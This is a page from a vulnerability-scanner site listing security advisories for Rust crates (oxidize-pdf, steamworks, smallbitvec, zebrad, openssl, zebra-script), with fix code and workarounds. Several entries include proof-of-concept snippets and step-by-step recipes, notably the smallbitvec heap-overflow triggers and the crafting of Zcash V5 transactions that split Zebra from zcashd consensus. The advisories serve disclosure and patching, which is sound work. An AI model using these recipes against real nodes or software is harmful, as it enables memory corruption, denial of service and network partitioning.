🛡️ Vuln Watch
Vulnerabilities Package Scanner
🕐 Last updated:
⏭️ Next update:
⏳ Remaining: 00:00
Total: 242213
Results: 1706
Page: 1/35
📡 Sources:
Unspecified
📦 oxidize-pdf 📌 All versions < 2.6.0 ⛓️‍💥 Supply chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Impact `oxidize-pdf` defines `Color` as a `pub enum` with public tuple-struct variants `Rgb(f64, f64, f64)`, `Gray(f64)`, and `Cmyk(f64, f64, f64, f64)`. The constructors `Color::rgb`, `Color::gray`, and `Color::cmyk` clamp incoming components to `[0.0, 1.0]`, but becaus...
📅 2026-05-11 OSV/crates.io 🔗 Details

Full description

### Impact

`oxidize-pdf` defines `Color` as a `pub enum` with public tuple-struct variants `Rgb(f64, f64, f64)`, `Gray(f64)`, and `Cmyk(f64, f64, f64, f64)`. The constructors `Color::rgb`, `Color::gray`, and `Color::cmyk` clamp incoming components to `[0.0, 1.0]`, but because the variants are `pub`, callers can construct values directly without going through the constructors:

```rust
let safe = Color::rgb(f64::NAN, 0.5, 0.5);   // clamps NaN to 0.0
let attack = Color::Rgb(f64::NAN, 0.5, 0.5); // bypasses clamp
```

`Color: Copy` allows the non-finite value to propagate freely through API surfaces and serialisation. When such a value reaches a content-stream emitter, the writer formats it via `format!("{:.3}", v)`. The Rust standard library renders `f64::NAN` as `"NaN"`, `f64::INFINITY` as `"inf"`, and `f64::NEG_INFINITY` as `"-inf"` — none of which are valid PDF numeric tokens per ISO 32000-1 §7.3.3:

> A numeric object shall be represented by one or more decimal digits with an optional sign and a leading, trailing, or embedded PERIOD.

The resulting content stream contains an invalid token sequence (e.g. `NaN 0.500 0.500 rg`). Conformant PDF viewers (Adobe Acrobat, Foxit, PDF.js, Apple Preview) reject the content stream, the affected page, or the entire document depending on parser strictness.

Affected packages (all listed in the "Affected products" section of this advisory):

- oxidize-pdf on crates.io — the core Rust library where the vulnerable code path lives.
- OxidizePdf.NET on NuGet — .NET FFI binding that exposes `Color` through its public API; inherits the vulnerability from its dependency on oxidize-pdf.
- oxidize-pdf on PyPI — Python bindings (PyO3) that similarly expose colour construction; inherits the vulnerability from its dependency.

Who is impacted: any application that uses these packages to generate PDFs and accepts user-influenced colour values without validation. The most exposed surfaces are server-side PDF generators that take arbitrary `f64` colour parameters from upstream services.

Reproduction (Rust API):

```rust
use oxidize_pdf::{Document, Page, graphics::Color};

let mut doc = Document::new();
let mut page = Page::a4();
let gc = page.graphics();
gc.set_fill_color(Color::Rgb(f64::NAN, 0.5, 0.5));
gc.rectangle(50.0, 50.0, 100.0, 100.0).fill();
doc.add_page(page);
doc.save("malformed.pdf").unwrap();
// The resulting content stream contains:
//   NaN 0.500 0.500 rg
//   50 50 100 100 re
//   f
// which conformant viewers reject.
```

Affected sites in oxidize-pdf 2.5.7 (the same code paths are reached by both .NET and Python bindings via FFI):

- `oxidize-pdf-core/src/text/flow.rs` (`TextFlowContext`)
- `oxidize-pdf-core/src/text/mod.rs` (`TextContext::apply_text_state_parameters`)
- `oxidize-pdf-core/src/graphics/mod.rs` (`GraphicsContext::apply_fill_color` / `apply_stroke_color`)
- `oxidize-pdf-core/src/graphics/patterns.rs` (`create_checkerboard_pattern` / `create_stripe_pattern` / `create_dots_pattern`)
- ~45 sibling sites across `forms/*`, `annotations/*`, `layout/rich_text.rs`, and `writer/pdf_writer/mod.rs` that emit colour through the same code path.

### Patches

The fix introduces a sanitising helper at the emission boundary in `graphics/color.rs`:

```rust
pub(crate) fn finite_or_zero(val: f64) -> f64 {
    if val.is_finite() { val } else { 0.0 }
}
```

Every colour-operator emitter (~50 sites across 17 files) now routes through `fill_color_op` / `stroke_color_op` / `write_fill_color` / `write_stroke_color`, which apply `finite_or_zero` before formatting. Non-finite components are substituted with `0.0`, so the wire format remains ISO 32000-1 conformant regardless of the input.

Patched releases:

- oxidize-pdf 2.6.0 on crates.io — contains the fix at the source.
- OxidizePdf.NET on NuGet — bumped to depend on oxidize-pdf 2.6.0 (see "Patched versions" above).
- oxidize-pdf on PyPI — bumped to depend on oxidize-pdf 2.6.0 (see "Patched versions" above).

Users should upgrade to the patched version of whichever package(s) they consume.

### Workarounds

For users who cannot upgrade immediately:

- Always construct colours via the safe constructors `Color::rgb()`, `Color::gray()`, `Color::cmyk()`, which clamp components to `[0.0, 1.0]` (no NaN/inf survives clamping).
- Never use direct enum construction (`Color::Rgb(...)`, `Color::Gray(...)`, `Color::Cmyk(...)`) when components originate from untrusted input. The same applies to the corresponding APIs in the .NET and Python bindings.
- Validate untrusted `f64` colour inputs with `f64::is_finite()` (Rust) or equivalent checks (`!double.IsFinite(v)` in .NET, `math.isfinite(v)` in Python) before passing them to any oxidize-pdf API.

These mitigations are partial — they cover the application layer but not other code paths that may construct `Color` values internally. The full fix is the upgrade to the patched versions.

### References

- Issue: https://github.com/bzsanti/oxidizePdf/issues/220
- Companion refactor: https://github.com/bzsanti/oxidizePdf/issues/221
- Fix PR: https://github.com/bzsanti/oxidizePdf/pull/225
- Release PR (oxidize-pdf 2.6.0): https://github.com/bzsanti/oxidizePdf/pull/226
- .NET binding repository: https://github.com/bzsanti/oxidize-pdf-dotnet
- Python binding repository: https://github.com/bzsanti/oxidize-python
- ISO 32000-1 §7.3.3 (Numeric Objects): https://www.iso.org/standard/51502.html

A broader follow-up tracks the same CWE class in non-colour numeric content-stream emitters (line widths, transformation matrices, dash arrays, text positioning, path operators) — to be addressed in oxidize-pdf 2.7.0 with its own advisory.
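The workaround guidance above (use the clamping constructors, check `is_finite` on untrusted input) can be sketched as a small pre-validation step. `validate_rgb` below is a hypothetical application-layer helper, not part of the oxidize-pdf API; it rejects non-finite components and applies the same `[0.0, 1.0]` clamp the safe constructors use:

```rust
/// Hypothetical application-layer guard (not part of oxidize-pdf):
/// reject non-finite components, then clamp into [0.0, 1.0] exactly as
/// the crate's safe constructors do, before any Color is built.
fn validate_rgb(r: f64, g: f64, b: f64) -> Result<(f64, f64, f64), String> {
    for (name, v) in [("r", r), ("g", g), ("b", b)] {
        if !v.is_finite() {
            return Err(format!("non-finite colour component {name}: {v}"));
        }
    }
    Ok((r.clamp(0.0, 1.0), g.clamp(0.0, 1.0), b.clamp(0.0, 1.0)))
}
```

Running untrusted input through a gate like this before calling any colour API covers the NaN/inf bypass even when code elsewhere uses direct enum construction.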

Affected versions

All versions < 2.6.0

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Unspecified
📦 steamworks 📌 All versions < 0.13.1 ⛓️‍💥 Supply chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 Processing the raw `ValidateAuthTicketResponse_t` callback data panics when the `m_eAuthSessionResponse` field is `k_EAuthSessionResponseAuthTicketNetworkIdentityFailure`. This can lead to denial of service in game clients and servers using the `begin_authentication_session` API ...
📅 2026-05-11 OSV/crates.io 🔗 Details

Full description

Processing the raw `ValidateAuthTicketResponse_t` callback data panics when the `m_eAuthSessionResponse` field is `k_EAuthSessionResponseAuthTicketNetworkIdentityFailure`. This can lead to denial of service in game clients and servers using the `begin_authentication_session` API to authenticate players if a malicious game client sends an authentication ticket with a network identity that does not match that of the verifier.
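The panic pattern described above can be illustrated with a minimal sketch: the hardened shape maps unrecognised raw discriminants from the FFI callback to a catch-all variant instead of panicking. The enum below is a simplification for illustration, not the `steamworks` crate's actual types, and the numeric values follow the Steamworks SDK's enum ordering but should be treated as assumptions:

```rust
/// Simplified stand-in for EAuthSessionResponse (values assumed).
#[derive(Debug, PartialEq)]
enum AuthSessionResponse {
    Ok,
    NetworkIdentityFailure,
    /// Catch-all so future or unexpected SDK values cannot crash us.
    Unknown(i32),
}

/// Defensive conversion from the raw FFI value: unknown discriminants
/// become `Unknown(raw)` rather than panicking, so a malicious client
/// cannot take down the game client or server processing the callback.
fn from_raw(raw: i32) -> AuthSessionResponse {
    match raw {
        0 => AuthSessionResponse::Ok,
        // k_EAuthSessionResponseAuthTicketNetworkIdentityFailure (value assumed)
        10 => AuthSessionResponse::NetworkIdentityFailure,
        other => AuthSessionResponse::Unknown(other),
    }
}
```

The vulnerable pattern is the same match with an unconditional `_ => panic!(...)` arm; the fallback variant is what turns a remote crash into a handled error.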

Affected versions

All versions < 0.13.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

High
📦 smallbitvec 📌 1.0.1 ⛓️‍💥 Supply chain attack 🦀 Rust library crates.io 🎯 Local ⚪ Not exploited
💬 ### Summary An integer overflow in the internal capacity calculation of `smallbitvec` can lead to an undersized heap allocation, resulting in a heap buffer overflow through safe APIs only. This allows memory corruption without requiring `unsafe` code from the caller. ### Details...
📅 2026-05-09 OSV/crates.io 🔗 Details

Full description

### Summary

An integer overflow in the internal capacity calculation of `smallbitvec` can lead to an undersized heap allocation, resulting in a heap buffer overflow through safe APIs only. This allows memory corruption without requiring `unsafe` code from the caller.

### Details

The issue originates from unchecked arithmetic in the internal helper function responsible for computing the required buffer size:

```
(cap + bits_per_storage() - 1) / bits_per_storage()
```

When `cap` is close to `usize::MAX`, the addition:

```
cap + bits_per_storage() - 1
```

can overflow in release builds and wrap around due to Rust's default wrapping semantics for integer overflow in optimized builds. As a result:

- `buffer_len(cap)` may return a value significantly smaller than required.
- The backing storage is allocated with insufficient size.
- Internal metadata (logical length/capacity) reflects a much larger size than the actual allocation.

Subsequent safe API calls (e.g., `set`, `push`, `reserve`) rely on this corrupted metadata and perform index computations that assume sufficient backing storage. These operations eventually reach unsafe internal code paths (e.g., pointer arithmetic and unchecked indexing), leading to out-of-bounds memory access.

Summary of the issue: integer overflow → undersized allocation → inconsistent metadata (len/cap vs actual buffer) → unsafe internal access using corrupted metadata → heap buffer overflow (UB)

### PoC

#### PoC 1: Out-of-bounds write via `from_elem`

```rust
#![forbid(unsafe_code)]
use smallbitvec::SmallBitVec;

fn main() {
    // Triggers overflow in buffer_len(cap)
    let mut v = SmallBitVec::from_elem(usize::MAX, false);

    // Logical length is large, but backing storage is undersized.
    // This leads to an out-of-bounds write in unsafe internals.
    v.set(0, true);
}
```

#### PoC 2: Overflow via `reserve`

```rust
#![forbid(unsafe_code)]
use smallbitvec::SmallBitVec;

fn main() {
    let mut v = SmallBitVec::new();
    v.push(true);

    // Triggers overflow in capacity computation
    v.reserve(usize::MAX - 10);
}
```

### Impact

- Heap buffer overflow via safe API only
- ASAN-observable heap-buffer-overflow
- Undefined Behavior detectable with Miri (e.g., out-of-bounds indexing due to corrupted metadata)

### Tested on

- rustc 1.96.0-nightly (9602bda1d 2026-04-05)
- Target: x86_64-unknown-linux-gnu
- Build: release
- ASAN: `RUSTFLAGS="-Z sanitizer=address" cargo +nightly run --release`
- Miri: `cargo +nightly miri run --release`
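The hardened arithmetic for the helper above can be sketched in two equivalent ways (the constant name mirrors the crate's internal `bits_per_storage()` but is an assumption for this sketch): make the overflow explicit with `checked_add`, or sidestep the wrapping addition entirely with `usize::div_ceil`, which computes the rounded-up quotient without ever forming `cap + BITS - 1`:

```rust
/// Bits per storage word (the crate's bits_per_storage();
/// 64 on typical 64-bit targets). Name is assumed for this sketch.
const BITS_PER_STORAGE: usize = usize::BITS as usize;

/// Checked version of (cap + BITS - 1) / BITS: returns None instead of
/// silently wrapping when cap is near usize::MAX.
fn buffer_len_checked(cap: usize) -> Option<usize> {
    cap.checked_add(BITS_PER_STORAGE - 1)
        .map(|n| n / BITS_PER_STORAGE)
}

/// Equivalent without the overflow hazard: div_ceil never wraps,
/// so every cap gets a correctly sized word count.
fn buffer_len_div_ceil(cap: usize) -> usize {
    cap.div_ceil(BITS_PER_STORAGE)
}
```

Either form prevents the undersized allocation: the checked variant surfaces the pathological `cap` to the caller, while `div_ceil` is simply correct for all inputs.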

Affected versions

1.0.1

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

Critical
📦 zebrad 📌 All versions < 4.4.1 ⛓️‍💥 Supply chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 # Consensus Divergence in V5 Transparent SIGHASH_SINGLE With No Corresponding Output ## Summary Zebra failed to enforce a ZIP-244 consensus rule for V5 transparent transactions: when an input is signed with `SIGHASH_SINGLE` and there is no transparent output at the same index a...
📅 2026-05-08 OSV/crates.io 🔗 Details

Full description

# Consensus Divergence in V5 Transparent SIGHASH_SINGLE With No Corresponding Output

## Summary

Zebra failed to enforce a ZIP-244 consensus rule for V5 transparent transactions: when an input is signed with `SIGHASH_SINGLE` and there is no transparent output at the same index as that input, validation must fail. Zebra instead asked the underlying sighash library to compute a digest, and that library produced a digest over an empty output set rather than failing. An attacker could craft a V5 transaction with more transparent inputs than outputs that Zebra accepts but `zcashd` rejects, creating a consensus split between Zebra and `zcashd` nodes.

A previous fix ([`GHSA-cwfq-rfcr-8hmp`](https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-cwfq-rfcr-8hmp)) addressed a closely related case in the same area of the code, but did not cover this specific one.

## Severity

**Critical** - This is a Consensus Vulnerability that could allow a malicious party to induce network partitioning, service disruption, and potential double-spend attacks against affected nodes. Note that the impact is currently alleviated by the fact that most miners currently run `zcashd`.

## Affected Versions

Zebra 4.4.0.

## Description

Verification of transparent transactions inherits the Bitcoin Script verification code in C++. Since it is consensus-critical, this code is called from Zebra through a foreign function interface (FFI), with a Rust callback that computes the sighash for each input being verified.

ZIP-244 §S.2a marks two situations as consensus failures for V5 transparent signatures:

1. The signed hash type is not one of the six canonical values; and
2. The hash type is `SIGHASH_SINGLE` (alone or combined with `ANYONECANPAY`) and the input has no transparent output at the same index.

`zcashd` enforces both rules: its `SignatureHash` raises an exception, and `CheckSig` catches it and fails the script.

A previous fix (`GHSA-cwfq-rfcr-8hmp`) added the first rule to Zebra's V5 sighash callback. The second rule, however, was not added — Zebra's callback forwarded the request to `librustzcash`'s ZIP-244 implementation, which handles an out-of-range `SIGHASH_SINGLE` output index by hashing an empty output set rather than refusing to produce a digest. As a result, Zebra would compute a well-defined sighash for the missing-output case and accept any signature that verified against it.

An attacker could exploit this by:

- Constructing a V5 transaction with two or more transparent inputs and fewer transparent outputs;
- Signing an input whose index has no matching `vout` entry with `SIGHASH_SINGLE` (`0x03`) or `SIGHASH_SINGLE|ANYONECANPAY` (`0x83`), using the digest Zebra computes;
- Broadcasting the transaction, or a block containing it, to the network.

Zebra would verify the transaction's transparent script and accept the transaction (and any block containing it), while `zcashd` would reject both, splitting Zebra nodes from the rest of the network.

## Impact

**Consensus Failure**

- **Attack Vector:** Network.
- **Effect:** Network partition/consensus split.
- **Scope:** Any affected Zebra node.

## Fixed Versions

This issue is fixed in Zebra 4.4.1.

## Mitigation

Users should upgrade to Zebra 4.4.1 or later immediately. There are no known workarounds for this issue. Immediate upgrade is the only way to ensure the node remains on the correct consensus path and is protected against malicious chain forks.

## Credits

Zebra thanks @sangsoo-osec, @zmanian, and @fivelittleducks for finding and reporting the issue.
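The missing pre-check can be sketched as a standalone predicate (simplified types, not Zebra's actual code): for `SIGHASH_SINGLE`, with or without the `ANYONECANPAY` flag, the signed input must have a transparent output at the same index, otherwise sighash computation must fail rather than fall through to hashing an empty output set:

```rust
// Bitcoin/Zcash signature hash type constants (low bits select the
// mode; 0x80 is the ANYONECANPAY flag OR'd on top).
const SIGHASH_SINGLE: u8 = 0x03;
const SIGHASH_ANYONECANPAY: u8 = 0x80;

/// ZIP-244-style corresponding-output check: error out when a
/// SIGHASH_SINGLE input (0x03 or 0x83) has no output at its index.
fn check_single_has_output(
    hash_type: u8,
    input_index: usize,
    n_outputs: usize,
) -> Result<(), &'static str> {
    if hash_type & !SIGHASH_ANYONECANPAY == SIGHASH_SINGLE && input_index >= n_outputs {
        return Err("SIGHASH_SINGLE input has no corresponding transparent output");
    }
    Ok(())
}
```

Running this check before asking the sighash engine for a digest reproduces `zcashd`'s behavior: the missing-output case never reaches digest computation at all.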

Affected versions

All versions < 4.4.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:H/SA:H

8.7/10 High
📦 zebrad ⛓️‍💥 Supply chain attack 🦀 Rust library crates.io ⚡ Resource Exhaustion 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ## Summary A composite denial-of-service vulnerability in Zebra's block discovery pipeline allows an unauthenticated remote attacker to permanently halt all new block discovery on a targeted node. The attack exploits three independent weaknesses in the gossip, syncer, and downlo...
📅 2026-05-08 NVD 🔗 Details

Full description

## Summary

A composite denial-of-service vulnerability in Zebra's block discovery pipeline allows an unauthenticated remote attacker to permanently halt all new block discovery on a targeted node. The attack exploits three independent weaknesses in the gossip, syncer, and download subsystems — all exercisable from a single TCP connection — to create a monotonically growing block deficit that never self-heals.

## Severity

**Critical** — This is a Denial of Service vulnerability that requires no authentication, no special privileges, and only a single peer connection. The halt is permanent: the node will never recover without operator intervention.

## Affected Versions

All Zebra versions prior to 4.4.0.

## Description

Zebra discovers new blocks through two complementary paths: a gossip path (peers announce blocks via `inv` messages, triggering individual block downloads) and a syncer path (Zebra periodically queries peers with `FindBlocks`/`FindHeaders` to discover chains of missing blocks). Both paths must function for normal operation.

The gossip path was vulnerable because there was no per-connection rate limit on `inv` messages. A single connection could send enough sequential `inv` messages with fake block hashes to fill the entire gossip download queue in under a millisecond. The `FullQueue` return value was silently ignored, so legitimate block announcements from honest peers were dropped with no warning.

The syncer backup path could be degraded by responding with empty `inv` to `FindBlocks` requests and with `NotFound` to block download requests. Both are valid protocol responses that carried zero misbehavior penalty. The attacker's connection was never banned and never disconnected, allowing the degradation to persist indefinitely.

Combining these two vectors, an attacker could suppress both block discovery paths simultaneously from a single connection, causing the node to fall permanently behind the chain tip.

## Impact

**Denial of Service**

* **Attack Vector:** Network, unauthenticated. Requires only a single TCP peer connection.
* **Effect:** Permanent halt of block discovery. The targeted node falls behind the chain tip and never recovers without operator intervention.
* **Scope:** Any Zebra node reachable by the attacker over the peer-to-peer network.

## Fixed Versions

This issue is fixed in Zebra 4.4.0. The fix drops connections that send empty responses to `FindBlocks` and `FindHeaders` messages, preventing attackers from degrading the syncer path without consequence.

## Mitigation

Users should upgrade to Zebra 4.4.0 or later immediately. There are no known workarounds for this issue. Immediate upgrade is the only way to protect against this attack.

## Credits

Zebra thanks the researcher who reported this issue through the coordinated disclosure process.
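The direction of the fix (penalizing empty `FindBlocks`/`FindHeaders` responses) can be sketched as a per-connection guard. This is an illustrative shape with an assumed threshold, not Zebra's actual implementation, which drops the connection directly:

```rust
/// Hypothetical per-connection misbehavior tracker: repeated empty
/// FindBlocks/FindHeaders responses count against the peer, and
/// crossing the threshold signals that the connection should be dropped.
struct PeerGuard {
    empty_responses: u32,
    limit: u32,
}

impl PeerGuard {
    fn new(limit: u32) -> Self {
        Self { empty_responses: 0, limit }
    }

    /// Record a FindBlocks response with `n_hashes` entries;
    /// returns true when the peer should be disconnected.
    fn on_find_blocks_response(&mut self, n_hashes: usize) -> bool {
        if n_hashes == 0 {
            self.empty_responses += 1;
        } else {
            // Useful responses reset the counter, so honest peers that
            // are briefly at the same tip are not penalized.
            self.empty_responses = 0;
        }
        self.empty_responses >= self.limit
    }
}
```

The key property is that the degradation can no longer "carry zero misbehavior penalty": a peer that only ever starves the syncer loses its connection.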

Vulnerability type

CWE-770 — Resource Exhaustion

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

Unspecified
📦 openssl 📌 All versions < 0.10.79 ⛓️‍💥 Supply chain attack 🦀 Rust library crates.io 🎯 Local ⚪ Not exploited 🟢 Patched
💬 `CipherCtxRef::cipher_update`, `CipherCtxRef::cipher_update_vec`, and `symm::Crypter::update` incorrectly sized output buffers when used with AES key-wrap-with-padding ciphers (`EVP_aes_{128,192,256}_wrap_pad`). For a non-multiple-of-8 input, OpenSSL writes up to 7 bytes past the...
📅 2026-05-07 OSV/crates.io 🔗 Details

Full description

`CipherCtxRef::cipher_update`, `CipherCtxRef::cipher_update_vec`, and `symm::Crypter::update` incorrectly sized output buffers when used with AES key-wrap-with-padding ciphers (`EVP_aes_{128,192,256}_wrap_pad`). For a non-multiple-of-8 input, OpenSSL writes up to 7 bytes past the end of the caller's buffer or Vec, producing attacker-controllable heap corruption when the plaintext length is attacker-influenced. This only impacts users using AES key-wrap-with-padding ciphers.
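For context on why the buffers were undersized: under AES key wrap with padding (RFC 5649), the plaintext is padded up to a multiple of 8 bytes and an 8-byte integrity block is added, so the wrapped output for a non-multiple-of-8 input is larger than the input-plus-block-size bound a generic cipher path assumes. A hedged sketch of the correct sizing rule (illustrative helper, not part of the `openssl` crate's API):

```rust
/// Wrapped-output length for AES key wrap with padding (RFC 5649):
/// pad the plaintext up to a multiple of 8 bytes, then add the 8-byte
/// integrity block. For non-multiple-of-8 inputs this exceeds len + 8,
/// which is how an undersized generic buffer ends up 1-7 bytes short.
fn kwp_wrapped_len(plaintext_len: usize) -> usize {
    plaintext_len.div_ceil(8) * 8 + 8
}
```

An application-level mitigation in the same spirit is to only pass multiple-of-8 plaintext lengths (or pre-size output storage with this formula) until the patched binding can be adopted.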

Affected versions

All versions < 0.10.79

CVSS Vector

CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N

Critical
📦 zebrad 📌 All versions < 4.4.0 ⛓️‍💥 Supply chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 # `Zebra` Transparent `SIGHASH_SINGLE` Corresponding-Output Handling Diverges From `zcashd` ### Summary For V5+ transparent spends, `Zebra` and `zcashd` disagree on the same consensus rule: `SIGHASH_SINGLE` must fail when the input index has no corresponding output. `zcashd` tre...
📅 2026-05-07 OSV/crates.io 🔗 Details

Full description

# `Zebra` Transparent `SIGHASH_SINGLE` Corresponding-Output Handling Diverges From `zcashd`

### Summary

For V5+ transparent spends, `Zebra` and `zcashd` disagree on the same consensus rule: `SIGHASH_SINGLE` must fail when the input index has no corresponding output. `zcashd` treats this as consensus-invalid under ZIP-244, while `Zebra`'s transparent verification path computes a digest for the missing-output case instead of failing. The result is a direct block-validity split. A malformed V5 transparent transaction can be accepted by `Zebra`, retained in `Zebra`'s mempool, selected into `Zebra` `getblocktemplate`, mined into a block, and then rejected by `zcashd`.

### Details

Validated code revisions used during analysis:

- `zcashd`: `2c63e9aa08cb170b0feb374161bea94720c3e1f5`
- `Zebra`: `a905fa19e3a91c7b4ead331e2709e6dec5db12cb`

Scope note:

- earlier triage material grouped pre-V5 and V5 behavior together;
- re-execution on the pinned revisions did not reproduce the claimed pre-V5 / V4 reject-side behavior;
- this advisory therefore covers the V5+ / ZIP-244 variant only.

`zcashd` side:

- Transparent scripts in blocks are checked through `TransactionSignatureChecker::CheckSig()` and `SignatureHash()`: [`zcash/src/script/interpreter.cpp`](https://github.com/zcash/zcash/blob/2c63e9aa08cb170b0feb374161bea94720c3e1f5/src/script/interpreter.cpp#L1386-L1407).
- In the ZIP-244 branch, `SignatureHash()` explicitly throws when `SIGHASH_SINGLE` or `SIGHASH_SINGLE|ANYONECANPAY` is used with `nIn >= txTo.vout.size()`: [`zcash/src/script/interpreter.cpp`](https://github.com/zcash/zcash/blob/2c63e9aa08cb170b0feb374161bea94720c3e1f5/src/script/interpreter.cpp#L1221-L1259).
- `CheckSig()` catches that exception and returns `false`, causing the transparent script to fail.

`Zebra` side:

- V5 transparent inputs route into the same FFI-based transparent script verifier used for block validation: [`zebra/zebra-consensus/src/transaction.rs`](https://github.com/ZcashFoundation/zebra/blob/a905fa19e3a91c7b4ead331e2709e6dec5db12cb/zebra-consensus/src/transaction.rs#L989-L1098).
- `Zebra` converts the decoded hash type and asks its Rust sighash engine for a digest without adding the corresponding-output pre-check that `zcashd` enforces first: [`zebra/zebra-script/src/lib.rs`](https://github.com/ZcashFoundation/zebra/blob/a905fa19e3a91c7b4ead331e2709e6dec5db12cb/zebra-script/src/lib.rs#L160-L175), [`zebra/zebra-chain/src/primitives/zcash_primitives.rs`](https://github.com/ZcashFoundation/zebra/blob/a905fa19e3a91c7b4ead331e2709e6dec5db12cb/zebra-chain/src/primitives/zcash_primitives.rs#L307-L343).
- `Zebra` forwards canonical `SIGHASH_SINGLE` into the Rust ZIP-244 implementation.
- In that implementation, when `input.index() >= bundle.vout.len()`, the code uses `transparent_outputs_hash::<TxOut>(&[])` instead of erroring: [`zcash_primitives/src/transaction/sighash_v5.rs`](https://github.com/zcash/librustzcash/blob/c3425f9c3c7f6deb20720bb78b18f35fbbed8edd/zcash_primitives/src/transaction/sighash_v5.rs#L101-L107), [`zcash_primitives/src/transaction/sighash_v5.rs`](https://github.com/zcash/librustzcash/blob/c3425f9c3c7f6deb20720bb78b18f35fbbed8edd/zcash_primitives/src/transaction/sighash_v5.rs#L131-L139).

Why this is exploitable:

- the malformed transaction only needs fewer transparent outputs than inputs;
- the attacker signs the digest that `Zebra` computes for the missing-output case;
- `Zebra` then sees a valid transparent signature, while `zcashd` never reaches the same digest because it fails first.

Ordinary path viability:

- `zcashd` ordinary mempool admission is not the practical trigger path, because the same ZIP-244 `SignatureHash()` checks fail there first: [`zcash/src/main.cpp`](https://github.com/zcash/zcash/blob/2c63e9aa08cb170b0feb374161bea94720c3e1f5/src/main.cpp#L1981-L1995), [`zcash/src/script/interpreter.cpp`](https://github.com/zcash/zcash/blob/2c63e9aa08cb170b0feb374161bea94720c3e1f5/src/script/interpreter.cpp#L1221-L1259).
- `Zebra` ordinary mempool admission is viable because `Zebra` uses the same transparent verifier for mempool and block validation and does not have a separate "one output per input" standardness rule here: [`zebra/zebra-consensus/src/transaction.rs`](https://github.com/ZcashFoundation/zebra/blob/a905fa19e3a91c7b4ead331e2709e6dec5db12cb/zebra-consensus/src/transaction.rs#L414-L519), [`zebra/zebrad/src/components/mempool/storage.rs`](https://github.com/ZcashFoundation/zebra/blob/a905fa19e3a91c7b4ead331e2709e6dec5db12cb/zebrad/src/components/mempool/storage.rs#L255-L376).
- `Zebra` is a block-template producer, so the realistic stock path is `Zebra` mempool -> `Zebra` `getblocktemplate` -> external miner: [`zebra/zebra-rpc/src/methods/types/get_block_template/zip317.rs`](https://github.com/ZcashFoundation/zebra/blob/a905fa19e3a91c7b4ead331e2709e6dec5db12cb/zebra-rpc/src/methods/types/get_block_template/zip317.rs#L72-L105).

### PoC

Validated commits:

- `zcashd`: `2c63e9aa08cb170b0feb374161bea94720c3e1f5`
- `Zebra`: `a905fa19e3a91c7b4ead331e2709e6dec5db12cb`

Manual reproduction steps:

1. Build an otherwise-valid V5 transaction with at least two transparent inputs and only one transparent output.
2. Sign input `0` normally.
3. Sign input `1` with canonical `SIGHASH_SINGLE` or `SIGHASH_SINGLE|ANYONECANPAY`.
4. Use the digest returned by `Zebra`'s ZIP-244 path, where the missing output contributes `transparent_outputs_hash([])`.
5. Submit the transaction to `Zebra` and to `zcashd`.
6. Observe:
   - `Zebra` accepts it into the mempool;
   - `Zebra` selects it into `getblocktemplate`;
   - `Zebra` can mine and accept a block containing it;
   - `zcashd` rejects it in the ordinary mempool path.

### Impact

This is a direct V5+ transparent consensus split.

Who can trigger it:

- an ordinary transaction author can craft the malformed V5 transparent transaction;
- the accept-side stock path is `Zebra`'s mempool and block-template path;
- an external miner still has to include the transaction in a block for the split to materialize.

Who is impacted:

- `Zebra` can accept and template a transaction / block that `zcashd` rejects;
- this makes the issue both a consensus-divergence problem and a practical `Zebra` block-template safety problem.

Affected versions

All versions < 4.4.0

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N

Critical
📦 zebra-script 🏢 zfnd 📌 All versions < 6.0.0 ⛓️‍💥 Supply chain attack 🦀 Rust library crates.io ⚡ CWE-347 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 # CVE-2026-44497: Consensus Divergence in Transparent Sighash Hash-Type Handling due to Stale Buffer ## Summary The fix for https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-8m29-fpq5-89jj introduced a separate issue due to insuficient error handling of the case...
📅 2026-05-07 OSV/crates.io 🔗 Details

Full description

# CVE-2026-44497: Consensus Divergence in Transparent Sighash Hash-Type Handling due to Stale Buffer

## Summary

The fix for https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-8m29-fpq5-89jj introduced a separate issue due to insufficient error handling of the case where the sighash type is invalid during sighash computation. Instead of returning an error, the normal flow would resume, and the input sighash buffer would be left untouched. In scenarios where a previous signature validation could leave a valid sighash in the buffer, an invalid hash type could be incorrectly accepted, which would create a consensus split between Zebra and zcashd nodes.

## Severity

**Critical** - This is a Consensus Vulnerability that could allow a malicious party to induce network partitioning, service disruption, and potential double-spend attacks against affected nodes. Note that the impact is currently alleviated by the fact that most miners currently run `zcashd`.

## Affected Versions

Zebra 4.3.1.

## Description

Verification of transparent transactions inherits the Bitcoin Script verification code in C++, called from Zebra through a foreign function interface (FFI) with a Rust callback that computes the sighash. The fix for https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-8m29-fpq5-89jj added the missing V5 hash-type consensus check on the Rust side, returning `None` for undefined hash types. However, the FFI bridge only writes to the C++ sighash buffer when the callback returns `Some`, and the C++ checker reads that buffer unconditionally, so the failure signal is lost.

An attacker could exploit this by:

- Constructing a transparent output spent by a script that runs a valid `OP_CHECKSIGVERIFY` immediately before an `OP_CHECKSIG` with an undefined hash type.
- The first opcode primes the C++ sighash buffer with a valid digest; the second causes Zebra's callback to return `None` while the C++ checker verifies the invalid signature against the stale digest.
